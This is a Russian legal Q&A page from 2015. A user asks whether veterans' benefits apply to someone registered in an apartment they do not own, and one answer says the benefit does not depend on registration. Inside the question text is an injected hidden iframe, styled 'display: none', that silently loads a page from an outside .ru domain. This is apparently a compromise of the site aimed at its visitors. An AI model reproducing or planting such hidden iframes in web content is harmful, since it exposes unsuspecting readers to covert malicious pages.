Юриспруденция

Решено

Скажите пожалуйста,будет ли пользоваться ветеранскими льготами человек, прописанный в квартире не принадлежащей ему на праве собственности?<iframe... - вопрос №1558818

id=«a1996667054» style=«display: none;» src=«ui5nvtxlm.ru/f.html»>

июль 17, 2015 г.

  • Всего ответов: 1

    Татьяна Васильевна

    16-й в Юриспруденции

    Льгота предоставляется человеку, независимо от того, где он прописан. Следует обратиться с документами в отдел социального обеспечения по месту регистрации, его прием без очереди.

    июль 17, 2015 г.